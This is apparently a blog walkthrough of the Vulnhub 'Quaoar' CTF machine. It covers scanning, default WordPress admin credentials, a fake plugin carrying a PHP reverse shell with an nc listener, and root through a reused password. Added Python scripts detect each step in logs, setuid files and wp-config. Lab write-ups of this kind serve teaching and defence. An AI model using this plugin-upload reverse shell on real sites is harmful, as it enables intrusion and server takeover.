Another week, another CTF under my belt. I’ve been doing a lot of CTF games the past few months. This time I took some time off my schedule to play the hackfest2016: Quaoar game. The difficulty level on this one is pretty low, which suited me fine this time around. It’s nice to have something to keep oneself occupied that doesn’t require much braining. Anyway, let’s cut to the chase!

Description

From Vulnhub:

Welcome to Quaoar
This is a vulnerable machine I created for the Hackfest 2016 CTF http://hackfest.ca/

Difficulty : Very Easy

Tips:

Here are the tools you can research to help you to own this machine:

- nmap
- dirb / dirbuster / BurpSmartBuster > nikto
- wpscan
- hydra
- Your Brain
- Coffee
- Google 🙂

Goals: This machine is intended to be doable by someone who is interested in learning computer security. There are 3 flags on this machine:

1. Get a shell
2. Get root access
3. There is a post exploitation flag on the box

Feedback: This is my first vulnerable machine, please give me feedback on how to improve! @ViperBlackSkull on Twitter, simon.nolet@hotmail.com. Special thanks to madmantm for testing.

SHA-256 DA39EC5E9A82B33BA2C0CD2B1F5E8831E75759C51B3A136D3CB5D8126E2A4753

You may have issues with VMware

Service discovery

This game did not require hunting for its IP address, since the address is shown right at the login prompt. Cutting directly to service discovery:

Command
sudo nmap -p1-65535 -A -T4 -sS 192.168.110.14

Services found

Service scan revealed some interesting services:

Port  Service      Product
22    ssh          OpenSSH
53    domain       ISC BIND
80    http         Apache httpd
110   pop3
139   netbios-ssn  Samba smbd
143   imap         Dovecot imapd
445   netbios-ssn  Samba smbd
993   imap         Dovecot imapd
995   pop3s

In addition, the scan stumbled over the following:

Service  Found
ssh      OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
domain   bind.version: 9.8.1-P1
http     robots.txt (with a disallowed entry: Hackers)
pop3     Dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA
netbios  workgroup: WORKGROUP
imap     post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS

This game seems propped up with all sorts of services. They may be a complete hoax; such things happen. At this point I do not know whether any of these services will come in handy later on.

Flag hunt

First flag: web

Most games want you to investigate the web part first. Visiting it in Firefox didn’t reveal anything interesting, neither in the HTML source nor in the images shown. Nmap did uncover a robots.txt file, so I began looking closer into it:

State       Path         Comment
Disallowed  Hackers      Does not exist
Allowed     /wordpress/  Exists

Not much to go by here, except WordPress. Trying dirb to push my luck:

$ dirb http://192.168.110.14 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w

This certainly took a while. After a couple of minutes I killed dirb and looked at the results so far. There seems to be a CMS (Lepton CMS) lurking in the shadows on this target. I toyed with the paths found, but the CMS appeared to do absolutely nothing, so I decided to skip it and focus on WordPress instead.

WordPress

Looking at WordPress installations is always fun. Time to bring out WPScan, adding user enumeration for good measure:

sudo wpscan --url http://192.168.110.14/wordpress/ --enumerate u

Found:

What                  Fact
/readme.html          WordPress version 3.9.14
/wp-content/uploads/  Upload directory has directory listing enabled

Also found these users:

Id  Login   Name
1   admin   admin
2   wpuser  wpuser

Seems like a normal WordPress site set up in a hurry. Perhaps whoever was responsible set it up with default credentials (admin:admin)? It’s worth a try!

[Screenshot: WordPress, logged in as admin]

Fascinating results! It is time to get shell access. Now, there are a couple of routes to do this. I often land on creating a fake plugin.

Getting shell

As mentioned, I am going to create a fake plugin. First I bring out my trusty Shelly shell (your path may vary):

$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php

Then add a nice plugin wrapper around it:

<?php

/*
Plugin Name: Shelly
Plugin URI: http://localhost
Description: Bla Bla Bla
Author: Pingmoose
Version: 1.0.1
Author URI: http://localhost
*/

// COPY CONTENTS OF shelly.php HERE

?>

I prepared Shelly with my IP address and listening port, then zipped the whole thing up:

$ zip shelly-plugin.zip shelly.php

Then I installed the plugin, without activating it:

[Screenshot: Plugin uploaded]

Setting up listener:

$ nc -lvp 4444

To activate the shell I visited 192.168.110.14/wordpress/wp-content/plugins/shelly-plugin/shelly.php. The listener picked up the connection and I had a shell:

[Screenshot: Shell access]
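Every step of the web phase above leaves a trace in the web server's access log, which is where a defender would catch this chain. The following Python script is an added example, not code from the original post nor from WPScan or WordPress: it parses Apache combined-format log lines and reports, per source IP, author-id enumeration, readme.html version disclosure, a login success following failed attempts, a plugin upload, and a direct request to a PHP file under wp-content/plugins/. The log lines are constructed for the example; the /wp-admin/update.php?action=upload-plugin upload path and the threshold of three author ids are assumptions to adjust for your own site.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (not from the original post).
# They model the chain described above: WPScan-style author enumeration,
# readme.html version disclosure, a successful login after a failed one,
# a plugin upload, and a direct request to a PHP file inside
# wp-content/plugins/ (how the uploaded webshell was triggered).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Feb/2017:10:01:01 +0000] "GET /wordpress/readme.html HTTP/1.1" 200 7402 "-" "WPScan v2.9"
10.0.0.5 - - [17/Feb/2017:10:01:02 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0 "-" "WPScan v2.9"
10.0.0.5 - - [17/Feb/2017:10:01:02 +0000] "GET /wordpress/?author=2 HTTP/1.1" 301 0 "-" "WPScan v2.9"
10.0.0.5 - - [17/Feb/2017:10:01:03 +0000] "GET /wordpress/?author=3 HTTP/1.1" 404 0 "-" "WPScan v2.9"
10.0.0.5 - - [17/Feb/2017:10:02:10 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3911 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2017:10:02:15 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2017:10:03:40 +0000] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2017:10:04:02 +0000] "GET /wordpress/wp-content/plugins/shelly-plugin/shelly.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2017:10:05:00 +0000] "GET /wordpress/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

AUTHOR_ENUM_THRESHOLD = 3   # distinct ?author= ids from one IP; assumed, tune per site


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_direct_plugin_php(path):
    """True when a PHP file under wp-content/plugins/ is requested directly.

    Plugin code normally runs through WordPress entry points (index.php,
    admin-ajax.php); a direct hit on a plugin file right after an upload is
    how the webshell above was triggered. A few legitimate plugins expose
    files this way too, so treat a hit as a lead to correlate, not a verdict.
    """
    return re.search(r'/wp-content/plugins/[^/?]+/[^?]*\.php(\?|$)', path) is not None


def analyze(log_text):
    """Return {ip: [findings]} for every source IP with at least one finding."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, reqs in per_ip.items():
        hits, authors, failed_logins = [], set(), 0
        for r in reqs:
            url = urlsplit(r["path"])
            qs = parse_qs(url.query)
            authors.update(qs.get("author", []))
            if url.path.endswith("/readme.html"):
                hits.append("version disclosure via readme.html")
            if r["method"] == "POST" and url.path.endswith("/wp-login.php"):
                if r["status"] == "200":        # WordPress re-renders the form on failure
                    failed_logins += 1
                elif r["status"] == "302" and failed_logins:   # redirect = login succeeded
                    hits.append(f"login success after {failed_logins} failed attempt(s)")
            if url.path.endswith("/update.php") and qs.get("action") == ["upload-plugin"]:
                hits.append("plugin upload")
            if is_direct_plugin_php(r["path"]):
                hits.append(f"direct request to plugin PHP: {url.path}")
        if len(authors) >= AUTHOR_ENUM_THRESHOLD:
            hits.insert(0, f"author enumeration ({len(authors)} ids)")
        if hits:
            findings[ip] = hits
    return findings


if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE_LOG).items():
        print(ip)
        for h in hits:
            print("  -", h)
```

Run on its own the script prints the findings for 10.0.0.5 and nothing for 10.0.0.9, which only browsed the front page. The single strongest signal is the last one: a plugin upload from an IP followed within minutes by a direct GET of a new PHP file under wp-content/plugins/ is worth an alert on its own, while the enumeration and readme hits mostly help you reconstruct how the credentials were found.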

The current shell is somewhat limited, so I spawned a proper TTY using a Python one-liner:

$ whoami
$ whereis python
$ python -c 'import pty; pty.spawn("/bin/bash")'

I looked around in the /home folder and found a flag hiding in the wpadmin folder (flag.txt). First flag: 2bafe61f03117ac66a73c3c514de796e.

[Screenshot: First flag]

Second flag: chasing ROOT

Moving on to getting ROOT access. First I checked whether there were any setuid binaries lying around that I could abuse:

$ cd /
$ find / -perm -4000 -user root 2> /dev/null
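The find command above is the attacker's view of the setuid surface; the defender's counterpart is to keep a baseline of setuid files and alert when a new one appears. The script below is an added example, not part of the original post or of any tool it mentions: it walks a tree, collects regular files with the setuid bit (owner_uid=0 reproduces the -user root filter of the find command), stores the list as JSON and diffs a fresh scan against it. The demo tree, with a fake passwd and a rogue helper, is constructed in a temporary directory so the example runs unprivileged; on a real host you would scan / and keep the baseline off the box.

```python
import json
import os
import stat
import tempfile


def find_setuid(root_dir, owner_uid=None):
    """Return {path: uid} for every regular file below root_dir with the setuid bit.

    owner_uid=0 matches the post's `find / -perm -4000 -user root`; None keeps
    every owner (the demo cannot create root-owned files as a normal user).
    """
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # vanished or unreadable; skip it
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is None or st.st_uid == owner_uid:
                found[path] = st.st_uid
    return found


def save_baseline(found, path):
    """Persist the set of known-good setuid paths as a JSON list."""
    with open(path, "w") as fh:
        json.dump(sorted(found), fh)


def load_baseline(path):
    with open(path) as fh:
        return set(json.load(fh))


def diff_against_baseline(current, baseline):
    """(added, removed): setuid files missing from the baseline, and baseline entries gone."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return added, removed


def build_demo_tree():
    """Constructed throwaway tree: an expected setuid passwd, a rogue setuid
    helper dropped in tmp/, and one ordinary binary. Returns (root, baseline_file)."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    expected = os.path.join(root, "usr", "bin", "passwd")
    rogue = os.path.join(root, "tmp", "helper")
    plain = os.path.join(root, "usr", "bin", "ls")
    for p in (expected, rogue, plain):
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    # Write first, then chmod: a write by a non-root user clears the setuid bit.
    os.chmod(expected, 0o4755)
    os.chmod(rogue, 0o4755)
    os.chmod(plain, 0o755)
    baseline_file = os.path.join(root, "suid-baseline.json")
    save_baseline({expected: os.getuid()}, baseline_file)   # only passwd is expected
    return root, baseline_file


def run_demo():
    """Scan the demo tree and diff it against its baseline."""
    root, baseline_file = build_demo_tree()
    current = find_setuid(root)
    added, removed = diff_against_baseline(current, load_baseline(baseline_file))
    return {"added": added, "removed": removed, "setuid_count": len(current)}


if __name__ == "__main__":
    result = run_demo()
    print("new setuid files:", result["added"])
    print("missing from baseline:", result["removed"])
```

The diff is deliberately path-based rather than hash-based so it stays cheap enough to run from cron; pairing it with a file-integrity tool that checks the contents of the baseline entries covers the other case, a known setuid binary being replaced in place.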

Nothing of interest found. Given that the WordPress installation looks like it was set up in a hurry, maybe passwords were reused as well? The best place to look first is /var/www/wordpress/wp-config.php:

[Screenshot: Credentials in wp-config.php]

Hit gold. I think the hint couldn’t be any clearer. The password is literally rootpassword!

[Screenshot: Second flag]
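The credential problem found in wp-config.php is something a defender can partly catch without ever logging in: the file's own contents and permissions tell most of the story. The script below is an added example, not from the original post or from WordPress: it parses the define() constants, flags a root database user, a short or guessable DB_PASSWORD and one that embeds the user name, and checks that the file is not world-readable. It cannot tell whether the database password is also the OS root password (that needs root and the shadow file). The sample wp-config.php content is constructed, and the 16-character minimum and the marker word list are assumptions.

```python
import os
import re
import stat
import tempfile

# Constructed wp-config.php fragment modelled on the finding above (not the
# target's actual file).
SAMPLE_WP_CONFIG = """\
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword');
define("DB_HOST", "localhost");
"""

# Matches define('KEY', 'value') with either quote style. Values containing a
# quote character are not handled; real audits should use a PHP tokenizer.
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

# Words that make a secret guessable on sight, as rootpassword was. Assumed list.
WEAK_MARKERS = ("password", "passwd", "admin", "root", "123456", "changeme", "wordpress")
MIN_PASSWORD_LEN = 16   # assumed policy value


def parse_defines(text):
    """Return {constant: value} for every define() in a wp-config.php body."""
    return dict(DEFINE_RE.findall(text))


def credential_findings(defines):
    """Findings about DB_USER / DB_PASSWORD that need no access beyond the file."""
    issues = []
    user = defines.get("DB_USER", "")
    pw = defines.get("DB_PASSWORD", "")
    if user == "root":
        issues.append("DB_USER is root; WordPress should use a dedicated least-privilege MySQL account")
    if not pw:
        issues.append("DB_PASSWORD is empty")
        return issues
    if len(pw) < MIN_PASSWORD_LEN:
        issues.append(f"DB_PASSWORD is short ({len(pw)} chars)")
    low = pw.lower()
    if any(m in low for m in WEAK_MARKERS):
        issues.append("DB_PASSWORD contains a guessable word")
    if user and user.lower() in low:
        issues.append("DB_PASSWORD contains the DB_USER name")
    return issues


def permission_findings(path):
    """wp-config.php should be readable only by its owner and the web server group."""
    mode = os.stat(path).st_mode
    issues = []
    if mode & stat.S_IROTH:
        issues.append(f"{path} is world-readable ({stat.filemode(mode)})")
    if mode & stat.S_IWOTH:
        issues.append(f"{path} is world-writable ({stat.filemode(mode)})")
    return issues


def audit(path):
    """Run both checks against a wp-config.php on disk and return all findings."""
    with open(path) as fh:
        defines = parse_defines(fh.read())
    return credential_findings(defines) + permission_findings(path)


def write_sample(mode=0o644):
    """Write SAMPLE_WP_CONFIG to a temp file with the given mode; returns its path."""
    fd, path = tempfile.mkstemp(suffix="-wp-config.php")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_WP_CONFIG)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for issue in audit(write_sample()):
        print("-", issue)
```

With the sample file at mode 0644 the audit reports four findings: the root database user, the short and guessable password, the password embedding the user name, and the world-readable file. Rewriting the sample at 0640 clears the last one, which is the quick fix; the others need a dedicated database account with a generated secret, and the reuse that handed over root on this box is exactly what that separation prevents.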

I navigated over to /root and found the flag: 8e3f9ec016e3598c5eec11fd3d73f6fb. According to the introduction text for this game there should be a third flag hidden somewhere.

Third flag: dancing like Indiana Jones

Time to do some braining. I am ROOT, so I can do anything. I had a gut feeling the last flag was tucked away in plain text, perhaps in a comment somewhere. I did this step manually, starting by looking in /etc. Found what I was looking for in /etc/cron.d/php5:

[Screenshot: Third flag]

The third flag: d46795f84148fd338603d0d6a9dbf8de
